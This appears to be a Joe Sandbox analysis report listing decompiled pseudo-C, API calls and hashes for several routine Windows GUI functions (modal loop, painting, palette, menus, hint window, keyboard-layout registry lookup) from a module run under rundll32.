                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: 744713Color$74471240Text
                          • String ID:
                          • API String ID: 3858318345-0
                          • Opcode ID: 784ab0d315fdd34ebb0636565c13920544a6494feb11af477f7add41b1a2d62e
                          • Instruction ID: e151ed0517eb7fb7366694b5035504945cd1b3e157513500d6d20112353928f3
                          • Opcode Fuzzy Hash: 784ab0d315fdd34ebb0636565c13920544a6494feb11af477f7add41b1a2d62e
                          • Instruction Fuzzy Hash: FB51F575704214AFDB96EF6CCD85FAA37AEAF48710F100155FA04EB386CA70E8458B66
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 75%
                          			E0281A5E4(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edi, void* __esi) {
                          				intOrPtr* _v8;
                          				intOrPtr _v12;
                          				intOrPtr _v16;
                          				intOrPtr _v20;
                          				short _v22;
                          				intOrPtr _v28;
                          				struct HWND__* _v32;
                          				char _v36;
                          				intOrPtr _t52;
                          				intOrPtr _t58;
                          				intOrPtr _t63;
                          				intOrPtr _t64;
                          				intOrPtr _t65;
                          				intOrPtr _t68;
                          				intOrPtr _t69;
                          				intOrPtr _t71;
                          				intOrPtr _t73;
                          				intOrPtr _t85;
                          				intOrPtr _t87;
                          				void* _t96;
                          				intOrPtr _t125;
                          				void* _t127;
                          				void* _t128;
                          				void* _t130;
                          				void* _t131;
                          				intOrPtr _t132;
                          
                          				_t128 = __esi;
                          				_t127 = __edi;
                          				_t111 = __ebx;
                          				_t130 = _t131;
                          				_t132 = _t131 + 0xffffffe0;
                          				_push(__ebx);
                          				_v36 = 0;
                          				_v8 = __eax;
                          				_push(_t130);
                          				_push(0x281a8be);
                          				_push( *[fs:eax]);
                          				 *[fs:eax] = _t132;
                          				E0282BF88();
                          				if( *((char*)(_v8 + 0x57)) != 0 ||  *((intOrPtr*)( *_v8 + 0x50))() == 0 || ( *(_v8 + 0x2f4) & 0x00000008) != 0 ||  *((char*)(_v8 + 0x22f)) == 1) {
                          					_t52 =  *0x28644f4; // 0x27f5404
                          					E027D6018(_t52,  &_v36);
                          					E027DBBC4(_v36, 1);
                          					E027D3A9C();
                          				}
                          				if(GetCapture() != 0) {
                          					SendMessageA(GetCapture(), 0x1f, 0, 0);
                          				}
                          				ReleaseCapture();
                          				_t58 =  *0x2865b58; // 0x41d1544
                          				E0281D488(_t58);
                          				_push(_t130);
                          				_push(0x281a8a1);
                          				_push( *[fs:eax]);
                          				 *[fs:eax] = _t132;
                          				 *(_v8 + 0x2f4) =  *(_v8 + 0x2f4) | 0x00000008;
                          				_v32 = GetActiveWindow();
                          				_t63 =  *0x2863c90; // 0x0
                          				_v20 = _t63;
                          				_t64 =  *0x2865b5c; // 0x41d1150
                          				_t20 = _t64 + 0x78; // 0x0
                          				_t65 =  *0x2865b5c; // 0x41d1150
                          				_t21 = _t65 + 0x7c; // 0x41d1394
                          				E027EB25C( *_t21,  *_t20, 0);
                          				_t68 =  *0x2865b5c; // 0x41d1150
                          				 *((intOrPtr*)(_t68 + 0x78)) = _v8;
                          				_t69 =  *0x2865b5c; // 0x41d1150
                          				_t24 = _t69 + 0x44; // 0x0
                          				_v22 =  *_t24;
                          				_t71 =  *0x2865b5c; // 0x41d1150
                          				E0281C130(_t71,  *_t20, 0);
                          				_t73 =  *0x2865b5c; // 0x41d1150
                          				_t26 = _t73 + 0x48; // 0x0
                          				_v28 =  *_t26;
                          				_v16 = E0281331C(0, _t111, _t127, _t128);
                          				_push(_t130);
                          				_push(0x281a87f);
                          				_push( *[fs:eax]);
                          				 *[fs:eax] = _t132;
                          				E0281A51C(_v8);
                          				_push(_t130);
                          				_push(0x281a7d3);
                          				_push( *[fs:eax]);
                          				 *[fs:eax] = _t132;
                          				SendMessageA(E02833F7C(_v8), 0xb000, 0, 0);
                          				 *((intOrPtr*)(_v8 + 0x24c)) = 0;
                          				do {
                          					_t85 =  *0x2865b58; // 0x41d1544
                          					E0281E544(_t85);
                          					_t87 =  *0x2865b58; // 0x41d1544
                          					if( *((char*)(_t87 + 0x9c)) == 0) {
                          						if( *((intOrPtr*)(_v8 + 0x24c)) != 0) {
                          							E0281A470(_v8);
                          						}
                          					} else {
                          						 *((intOrPtr*)(_v8 + 0x24c)) = 2;
                          					}
                          				} while ( *((intOrPtr*)(_v8 + 0x24c)) == 0);
                          				_v12 =  *((intOrPtr*)(_v8 + 0x24c));
                          				SendMessageA(E02833F7C(_v8), 0xb001, 0, 0);
                          				_t96 = E02833F7C(_v8);
                          				if(_t96 != GetActiveWindow()) {
                          					_v32 = 0;
                          				}
                          				_pop(_t125);
                          				 *[fs:eax] = _t125;
                          				_push(0x281a7da);
                          				return E0281A508(_v8);
                          			}

                          APIs
                          • GetCapture.USER32 ref: 0281A654
                          • GetCapture.USER32 ref: 0281A663
                          • SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 0281A669
                          • ReleaseCapture.USER32 ref: 0281A66E
                          • GetActiveWindow.USER32 ref: 0281A695
                          • SendMessageA.USER32(00000000,0000B000,00000000,00000000), ref: 0281A72B
                          • SendMessageA.USER32(00000000,0000B001,00000000,00000000), ref: 0281A7A0
                          • GetActiveWindow.USER32 ref: 0281A7AF
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: CaptureMessageSend$ActiveWindow$Release
                          • String ID:
                          • API String ID: 862346643-0
                          • Opcode ID: 67bb4b09ee0102bd784c8eb2725d0641cb9244375233afd4db0ca43c738994d2
                          • Instruction ID: a3f474946075c734dc851b7ae158a605c0505d1f7b979f67427614e1665919ec
                          • Opcode Fuzzy Hash: 67bb4b09ee0102bd784c8eb2725d0641cb9244375233afd4db0ca43c738994d2
                          • Instruction Fuzzy Hash: 0251287CA41204AFDB15EF69D989B9DB7FAAF08700F5184A0E804EB2A1D774AE40DF51
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E02831FB8(void* __eax, void* __ecx, struct HDC__* __edx, void* __eflags, intOrPtr _a4) {
                          				int _v8;
                          				int _v12;
                          				int _v16;
                          				char _v20;
                          				struct tagRECT _v36;
                          				signed int _t54;
                          				intOrPtr _t59;
                          				int _t61;
                          				void* _t63;
                          				void* _t66;
                          				void* _t82;
                          				int _t98;
                          				struct HDC__* _t99;
                          
                          				_t99 = __edx;
                          				_t82 = __eax;
                          				 *(__eax + 0x54) =  *(__eax + 0x54) | 0x00000080;
                          				_v16 = SaveDC(__edx);
                          				E0282C064(__edx, _a4, __ecx);
                          				IntersectClipRect(__edx, 0, 0,  *(_t82 + 0x48),  *(_t82 + 0x4c));
                          				_t98 = 0;
                          				_v12 = 0;
                          				if((GetWindowLongA(E02833F7C(_t82), 0xffffffec) & 0x00000002) == 0) {
                          					_t54 = GetWindowLongA(E02833F7C(_t82), 0xfffffff0);
                          					__eflags = _t54 & 0x00800000;
                          					if((_t54 & 0x00800000) != 0) {
                          						_v12 = 3;
                          						_t98 = 0xa00f;
                          					}
                          				} else {
                          					_v12 = 0xa;
                          					_t98 = 0x200f;
                          				}
                          				if(_t98 != 0) {
                          					SetRect( &_v36, 0, 0,  *(_t82 + 0x48),  *(_t82 + 0x4c));
                          					DrawEdge(_t99,  &_v36, _v12, _t98);
                          					E0282C064(_t99, _v36.top, _v36.left);
                          					IntersectClipRect(_t99, 0, 0, _v36.right - _v36.left, _v36.bottom - _v36.top);
                          				}
                          				E0282E93C(_t82, _t99, 0x14, 0);
                          				E0282E93C(_t82, _t99, 0xf, 0);
                          				_t59 =  *((intOrPtr*)(_t82 + 0x19c));
                          				if(_t59 == 0) {
                          					L12:
                          					_t61 = RestoreDC(_t99, _v16);
                          					 *(_t82 + 0x54) =  *(_t82 + 0x54) & 0x0000ff7f;
                          					return _t61;
                          				} else {
                          					_t63 =  *((intOrPtr*)(_t59 + 8)) - 1;
                          					if(_t63 < 0) {
                          						goto L12;
                          					}
                          					_v20 = _t63 + 1;
                          					_v8 = 0;
                          					do {
                          						_t66 = E027EB1E0( *((intOrPtr*)(_t82 + 0x19c)), _v8);
                          						_t107 =  *((char*)(_t66 + 0x57));
                          						if( *((char*)(_t66 + 0x57)) != 0) {
                          							E02831FB8(_t66,  *((intOrPtr*)(_t66 + 0x40)), _t99, _t107,  *((intOrPtr*)(_t66 + 0x44)));
                          						}
                          						_v8 = _v8 + 1;
                          						_t36 =  &_v20;
                          						 *_t36 = _v20 - 1;
                          					} while ( *_t36 != 0);
                          					goto L12;
                          				}
                          			}

















                          APIs
                          • SaveDC.GDI32 ref: 02831FCE
                            • Part of subcall function 0282C064: GetWindowOrgEx.GDI32(55DFEBFF), ref: 0282C072
                            • Part of subcall function 0282C064: SetWindowOrgEx.GDI32(55DFEBFF,55DFEBFF,55DFEBFF,00000000), ref: 0282C088
                          • IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 02831FEF
                          • GetWindowLongA.USER32(00000000,000000EC), ref: 02832005
                          • GetWindowLongA.USER32(00000000,000000F0), ref: 02832027
                          • SetRect.USER32(?,00000000,00000000,?,?), ref: 02832053
                          • DrawEdge.USER32(?,?,?,00000000), ref: 02832062
                          • IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 02832087
                          • RestoreDC.GDI32(?,?), ref: 028320F8
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: Window$Rect$ClipIntersectLong$DrawEdgeRestoreSave
                          • String ID:
                          • API String ID: 2976466617-0
                          • Opcode ID: 37b97656b53d42e730db4731b298e45761733f91c633c8945db713b9403b0ed4
                          • Instruction ID: 8d718bf9b79e91abb01e906e2bac921d113307e04240d7a1887038345e7800c3
                          • Opcode Fuzzy Hash: 37b97656b53d42e730db4731b298e45761733f91c633c8945db713b9403b0ed4
                          • Instruction Fuzzy Hash: 9C416475B00214ABDB11EBACCC84FAE77BEAF44700F104155EA04EB289DB75ED45CBA5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 70%
                          			E027F8E24(void* __ebx) {
                          				struct HDC__* _v8;
                          				struct tagPALETTEENTRY _v1000;
                          				struct tagPALETTEENTRY _v1004;
                          				struct tagPALETTEENTRY _v1032;
                          				signed int _v1034;
                          				short _v1036;
                          				void* _t24;
                          				int _t53;
                          				intOrPtr _t60;
                          				void* _t62;
                          				void* _t63;
                          
                          				_t62 = _t63;
                          				_v1036 = 0x300;
                          				_v1034 = 0x10;
                          				E027D2978(_t24, 0x40,  &_v1032);
                          				_v8 = GetDC(0);
                          				_push(_t62);
                          				_push(0x27f8f21);
                          				_push( *[fs:eax]);
                          				 *[fs:eax] = _t63 + 0xfffffbf8;
                          				_t53 = GetDeviceCaps(_v8, 0x68);
                          				if(_t53 >= 0x10) {
                          					GetSystemPaletteEntries(_v8, 0, 8,  &_v1032);
                          					if(_v1004 != 0xc0c0c0) {
                          						GetSystemPaletteEntries(_v8, _t53 - 8, 8, _t62 + (_v1034 & 0x0000ffff) * 4 - 0x424);
                          					} else {
                          						GetSystemPaletteEntries(_v8, _t53 - 8, 1,  &_v1004);
                          						GetSystemPaletteEntries(_v8, _t53 - 7, 7, _t62 + (_v1034 & 0x0000ffff) * 4 - 0x420);
                          						GetSystemPaletteEntries(_v8, 7, 1,  &_v1000);
                          					}
                          				}
                          				_pop(_t60);
                          				 *[fs:eax] = _t60;
                          				_push(0x27f8f28);
                          				return ReleaseDC(0, _v8);
                          			}















                          APIs
                          • GetDC.USER32(00000000), ref: 027F8E52
                          • GetDeviceCaps.GDI32(?,00000068), ref: 027F8E6E
                          • GetSystemPaletteEntries.GDI32(?,00000000,00000008,?), ref: 027F8E8D
                          • GetSystemPaletteEntries.GDI32(?,-00000008,00000001,00C0C0C0), ref: 027F8EB1
                          • GetSystemPaletteEntries.GDI32(?,00000000,00000007,?), ref: 027F8ECF
                          • GetSystemPaletteEntries.GDI32(?,00000007,00000001,?), ref: 027F8EE3
                          • GetSystemPaletteEntries.GDI32(?,00000000,00000008,?), ref: 027F8F03
                          • ReleaseDC.USER32(00000000,?), ref: 027F8F1B
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: EntriesPaletteSystem$CapsDeviceRelease
                          • String ID:
                          • API String ID: 1781840570-0
                          • Opcode ID: 73fbfbb183558bc964ed4a1c9fd10195bdf114f48749c8fe29ee3a65f105e074
                          • Instruction ID: b490a05ffe8949501608b0c6433bd95c43dfb4339cf0aed2a381a0c4b04131e9
                          • Opcode Fuzzy Hash: 73fbfbb183558bc964ed4a1c9fd10195bdf114f48749c8fe29ee3a65f105e074
                          • Instruction Fuzzy Hash: 3E2160B1A54208BEEB51DBA4DD85FAEB3BDEB08704F5104A1F704E72C0E675AE409F25
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 87%
                          			E028233AC(void* __eax, void* __ebx, char __ecx, struct HMENU__* __edx, void* __edi, void* __esi) {
                          				char _v5;
                          				char _v12;
                          				char _v13;
                          				struct tagMENUITEMINFOA _v61;
                          				char _v68;
                          				intOrPtr _t103;
                          				CHAR* _t109;
                          				char _t115;
                          				short _t149;
                          				void* _t154;
                          				intOrPtr _t161;
                          				intOrPtr _t184;
                          				struct HMENU__* _t186;
                          				int _t190;
                          				void* _t192;
                          				intOrPtr _t193;
                          				void* _t196;
                          				void* _t205;
                          
                          				_t155 = __ecx;
                          				_v68 = 0;
                          				_v12 = 0;
                          				_v5 = __ecx;
                          				_t186 = __edx;
                          				_t154 = __eax;
                          				_push(_t196);
                          				_push(0x2823607);
                          				_push( *[fs:eax]);
                          				 *[fs:eax] = _t196 + 0xffffffc0;
                          				if( *((char*)(__eax + 0x3e)) == 0) {
                          					L22:
                          					_pop(_t161);
                          					 *[fs:eax] = _t161;
                          					_push(0x282360e);
                          					E027D40E8( &_v68);
                          					return E027D40E8( &_v12);
                          				}
                          				E027D4180( &_v12,  *((intOrPtr*)(__eax + 0x30)));
                          				if(E02825328(_t154) <= 0) {
                          					__eflags =  *((short*)(_t154 + 0x60));
                          					if( *((short*)(_t154 + 0x60)) == 0) {
                          						L8:
                          						if((GetVersion() & 0x000000ff) < 4) {
                          							_t190 =  *(0x2863e44 + ((E027D44F4( *((intOrPtr*)(_t154 + 0x30)), 0x282362c) & 0xffffff00 | __eflags == 0x00000000) & 0x0000007f) * 4) |  *0x02863E38 |  *0x02863E28 |  *0x02863E30 | 0x00000400;
                          							_t103 = E02825328(_t154);
                          							__eflags = _t103;
                          							if(_t103 <= 0) {
                          								InsertMenuA(_t186, 0xffffffff, _t190,  *(_t154 + 0x50) & 0x0000ffff, E027D45A8(_v12));
                          							} else {
                          								_t109 = E027D45A8( *((intOrPtr*)(_t154 + 0x30)));
                          								InsertMenuA(_t186, 0xffffffff, _t190 | 0x00000010, E028238BC(_t154), _t109);
                          							}
                          							goto L22;
                          						}
                          						_v61.cbSize = 0x2c;
                          						_v61.fMask = 0x3f;
                          						_t192 = E028258E4(_t154);
                          						if(_t192 == 0 ||  *((char*)(_t192 + 0x40)) == 0 && E02824F00(_t154) == 0) {
                          							if( *((intOrPtr*)(_t154 + 0x4c)) == 0) {
                          								L14:
                          								_t115 = 0;
                          								goto L16;
                          							}
                          							_t205 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t154 + 0x4c)))) + 0x1c))();
                          							if(_t205 == 0) {
                          								goto L15;
                          							}
                          							goto L14;
                          						} else {
                          							L15:
                          							_t115 = 1;
                          							L16:
                          							_v13 = _t115;
                          							_v61.fType =  *(0x2863e78 + ((E027D44F4( *((intOrPtr*)(_t154 + 0x30)), 0x282362c) & 0xffffff00 | _t205 == 0x00000000) & 0x0000007f) * 4) |  *0x02863E70 |  *0x02863E4C |  *0x02863E80 |  *0x02863E88;
                          							_v61.fState =  *0x02863E58 |  *0x02863E68 |  *0x02863E60;
                          							_v61.wID =  *(_t154 + 0x50) & 0x0000ffff;
                          							_v61.hSubMenu = 0;
                          							_v61.hbmpChecked = 0;
                          							_v61.hbmpUnchecked = 0;
                          							_v61.dwTypeData = E027D45A8(_v12);
                          							if(E02825328(_t154) > 0) {
                          								_v61.hSubMenu = E028238BC(_t154);
                          							}
                          							InsertMenuItemA(_t186, 0xffffffff, 0xffffffff,  &_v61);
                          							goto L22;
                          						}
                          					}
                          					_t193 =  *((intOrPtr*)(_t154 + 0x64));
                          					__eflags = _t193;
                          					if(_t193 == 0) {
                          						L7:
                          						_push(_v12);
                          						_push(0x2823620);
                          						E02822A10( *((intOrPtr*)(_t154 + 0x60)), _t154, _t155,  &_v68, _t193);
                          						_push(_v68);
                          						E027D4468();
                          						goto L8;
                          					}
                          					__eflags =  *((intOrPtr*)(_t193 + 0x64));
                          					if( *((intOrPtr*)(_t193 + 0x64)) != 0) {
                          						goto L7;
                          					}
                          					_t184 =  *0x28222a0; // 0x28222ec
                          					_t149 = E027D3398( *((intOrPtr*)(_t193 + 4)), _t184);
                          					__eflags = _t149;
                          					if(_t149 != 0) {
                          						goto L8;
                          					}
                          					goto L7;
                          				}
                          				_v61.hSubMenu = E028238BC(_t154);
                          				goto L8;
                          			}






















                          APIs
                          • InsertMenuItemA.USER32(?,000000FF,000000FF,0000002C), ref: 02823558
                          • GetVersion.KERNEL32(00000000,02823607), ref: 02823448
                            • Part of subcall function 028238BC: CreatePopupMenu.USER32 ref: 028238D7
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: Menu$CreateInsertItemPopupVersion
                          • String ID: ,$?
                          • API String ID: 133695497-2308483597
                          • Opcode ID: 22d3600ef0d7a31d57b477a23740c375edc2ab108d4df94f1e074aacc6498583
                          • Instruction ID: 3a89e05974f0110166069f5437adc6ef9dc248105ed1acde38dbb935ae468b62
                          • Opcode Fuzzy Hash: 22d3600ef0d7a31d57b477a23740c375edc2ab108d4df94f1e074aacc6498583
                          • Instruction Fuzzy Hash: 2E61243CE00264ABDB11EF78D89469A7BFABF09700F4494E5E944E7346D738D889CB60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 69%
                          			E028354D0(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                          				intOrPtr* _v8;
                          				void _v12;
                          				intOrPtr _v16;
                          				int _v24;
                          				int _v28;
                          				intOrPtr _v32;
                          				char _v36;
                          				intOrPtr* _t80;
                          				intOrPtr _t91;
                          				void* _t119;
                          				intOrPtr _t136;
                          				intOrPtr* _t145;
                          				void* _t148;
                          
                          				asm("movsd");
                          				asm("movsd");
                          				asm("movsd");
                          				asm("movsd");
                          				_t119 = __ecx;
                          				_v8 = __eax;
                          				_t145 =  *0x2864774; // 0x2865b5c
                          				 *((char*)(_v8 + 0x210)) = 1;
                          				_push(_t148);
                          				_push(0x28356a9);
                          				_push( *[fs:eax]);
                          				 *[fs:eax] = _t148 + 0xffffffe0;
                          				E0282D780(_v8, __ecx, __ecx, _t145);
                          				_v16 = _v16 + 4;
                          				E0282E9E0(_v8,  &_v28);
                          				if(E0281B9C0( *_t145) <  *(_v8 + 0x4c) + _v24) {
                          					_v24 = E0281B9C0( *_t145) -  *(_v8 + 0x4c);
                          				}
                          				if(E0281B9E0( *_t145) <  *(_v8 + 0x48) + _v28) {
                          					_v28 = E0281B9E0( *_t145) -  *(_v8 + 0x48);
                          				}
                          				if(E0281B9A0( *_t145) > _v28) {
                          					_v28 = E0281B9A0( *_t145);
                          				}
                          				if(E0281B980( *_t145) > _v16) {
                          					_v16 = E0281B980( *_t145);
                          				}
                          				SetWindowPos(E02833F7C(_v8), 0xffffffff, _v28, _v24,  *(_v8 + 0x48),  *(_v8 + 0x4c), 0x10);
                          				if(GetTickCount() -  *((intOrPtr*)(_v8 + 0x214)) > 0xfa && E027D43A8(_t119) < 0x64 &&  *0x2863eb8 != 0) {
                          					SystemParametersInfoA(0x1016, 0,  &_v12, 0);
                          					if(_v12 != 0) {
                          						SystemParametersInfoA(0x1018, 0,  &_v12, 0);
                          						if(_v12 == 0) {
                          							E02838768( &_v36);
                          							if(_v32 <= _v24) {
                          							}
                          						}
                          						 *0x2863eb8(E02833F7C(_v8), 0x64,  *0x02863FC0 | 0x00040000);
                          					}
                          				}
                          				_t80 =  *0x28645d4; // 0x2865b58
                          				_t45 =  *_t80 + 0x30; // 0x0
                          				E028316B0(_v8,  *_t45);
                          				ShowWindow(E02833F7C(_v8), 4);
                          				 *((intOrPtr*)( *_v8 + 0x7c))();
                          				_pop(_t136);
                          				 *[fs:eax] = _t136;
                          				_push(0x28356b0);
                          				 *((intOrPtr*)(_v8 + 0x214)) = GetTickCount();
                          				_t91 = _v8;
                          				 *((char*)(_t91 + 0x210)) = 0;
                          				return _t91;
                          			}

















                          APIs
                          • SetWindowPos.USER32(00000000,000000FF,?,?,?,?,00000010,00000000,028356A9), ref: 028355B5
                          • GetTickCount.KERNEL32 ref: 028355BA
                          • SystemParametersInfoA.USER32(00001016,00000000,?,00000000), ref: 028355F5
                          • SystemParametersInfoA.USER32(00001018,00000000,00000000,00000000), ref: 0283560D
                          • AnimateWindow.USER32(00000000,00000064,00000001), ref: 02835653
                          • ShowWindow.USER32(00000000,00000004,00000000,000000FF,?,?,?,?,00000010,00000000,028356A9), ref: 02835676
                            • Part of subcall function 02838768: GetCursorPos.USER32(?), ref: 0283876C
                          • GetTickCount.KERNEL32 ref: 02835690
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: Window$CountInfoParametersSystemTick$AnimateCursorShow
                          • String ID:
                          • API String ID: 3024527889-0
                          • Opcode ID: b83bdb32dfeaee1045fa02d8ee2b6da0c8490619bc3cad7d5b61e2f0d7f65c9b
                          • Instruction ID: 7902b9319f6804c99918e6c0ea148b17f761cf9ad30a9150b37da86ad90e8a16
                          • Opcode Fuzzy Hash: b83bdb32dfeaee1045fa02d8ee2b6da0c8490619bc3cad7d5b61e2f0d7f65c9b
                          • Instruction Fuzzy Hash: DD511A7CA00209EFDB11EFA8C585B9EB7F6AF08304F6045A0E544EB295D775AE40DF91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 77%
                          			E0281BDF0(intOrPtr __eax, void* __ebx, void* __fp0) {
                          				intOrPtr _v8;
                          				intOrPtr _v12;
                          				int _v16;
                          				signed int _v20;
                          				int _v24;
                          				void* _v28;
                          				char _v32;
                          				struct HKL__* _v288;
                          				char _v544;
                          				char _v608;
                          				char _v612;
                          				char _v616;
                          				char _v620;
                          				void* _t78;
                          				intOrPtr _t124;
                          				intOrPtr _t129;
                          				void* _t135;
                          				void* _t136;
                          				intOrPtr _t137;
                          				void* _t147;
                          
                          				_t147 = __fp0;
                          				_t135 = _t136;
                          				_t137 = _t136 + 0xfffffd98;
                          				_v620 = 0;
                          				_v8 = __eax;
                          				_push(_t135);
                          				_push(0x281bfbb);
                          				_push( *[fs:eax]);
                          				 *[fs:eax] = _t137;
                          				if( *((intOrPtr*)(_v8 + 0x34)) != 0) {
                          					L11:
                          					_v12 =  *((intOrPtr*)(_v8 + 0x34));
                          					_pop(_t124);
                          					 *[fs:eax] = _t124;
                          					_push(0x281bfc2);
                          					return E027D40E8( &_v620);
                          				} else {
                          					 *((intOrPtr*)(_v8 + 0x34)) = E027D31DC(1);
                          					E027D40E8(_v8 + 0x38);
                          					_v16 = GetKeyboardLayoutList(0x40,  &_v288);
                          					_t78 = _v16 - 1;
                          					if(_t78 < 0) {
                          						L10:
                          						 *((char*)( *((intOrPtr*)(_v8 + 0x34)) + 0x1d)) = 0;
                          						E027ED854( *((intOrPtr*)(_v8 + 0x34)), 1);
                          						goto L11;
                          					} else {
                          						_v32 = _t78 + 1;
                          						_v20 = 0;
                          						do {
                          							if(E02838BE4( *((intOrPtr*)(_t135 + _v20 * 4 - 0x11c))) == 0) {
                          								goto L9;
                          							} else {
                          								_v616 =  *((intOrPtr*)(_t135 + _v20 * 4 - 0x11c));
                          								_v612 = 0;
                          								if(RegOpenKeyExA(0x80000002, E027D91E4( &_v608,  &_v616, "System\\CurrentControlSet\\Control\\Keyboard Layouts\\%.8x", _t147, 0), 0, 0x20019,  &_v28) != 0) {
                          									goto L9;
                          								} else {
                          									_push(_t135);
                          									_push(0x281bf6f);
                          									_push( *[fs:eax]);
                          									 *[fs:eax] = _t137;
                          									_v24 = 0x100;
                          									if(RegQueryValueExA(_v28, "layout text", 0, 0,  &_v544,  &_v24) == 0) {
                          										E027D4358( &_v620, 0x100,  &_v544);
                          										 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x34)))) + 0x3c))();
                          										if( *((intOrPtr*)(_t135 + _v20 * 4 - 0x11c)) ==  *((intOrPtr*)(_v8 + 0x3c))) {
                          											E027D4358(_v8 + 0x38, 0x100,  &_v544);
                          										}
                          									}
                          									_pop(_t129);
                          									 *[fs:eax] = _t129;
                          									_push(0x281bf76);
                          									return RegCloseKey(_v28);
                          								}
                          							}
                          							goto L12;
                          							L9:
                          							_v20 = _v20 + 1;
                          							_t51 =  &_v32;
                          							 *_t51 = _v32 - 1;
                          						} while ( *_t51 != 0);
                          						goto L10;
                          					}
                          				}
                          				L12:
                          			}

                          APIs
                          • GetKeyboardLayoutList.USER32(00000040,?,?,?,?,?,?,?,?,?,00000000,0281BFBB,?,?,?,0281C024), ref: 0281BE46
                          • RegOpenKeyExA.ADVAPI32(80000002,00000000), ref: 0281BEBC
                          • RegQueryValueExA.ADVAPI32(?,layout text,00000000,00000000,?,?,00000000,0281BF6F,?,80000002,00000000), ref: 0281BEF6
                          • RegCloseKey.ADVAPI32(?,0281BF76,00000000,?,?,00000000,0281BF6F,?,80000002,00000000), ref: 0281BF69
                          Strings
                          • layout text, xrefs: 0281BEED
                          • System\CurrentControlSet\Control\Keyboard Layouts\%.8x, xrefs: 0281BEA6
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: CloseKeyboardLayoutListOpenQueryValue
                          • String ID: System\CurrentControlSet\Control\Keyboard Layouts\%.8x$layout text
                          • API String ID: 1703357764-2652665750
                          • Opcode ID: 497a1b5d73bc6f7646845c49dd53b7856febeed75787d5bd5f7aa2980b61dbcb
                          • Instruction ID: 6820764ff0809ff3c73f12bb0c2d0c069bd8c3ab9fc30f7eeca490056993d27f
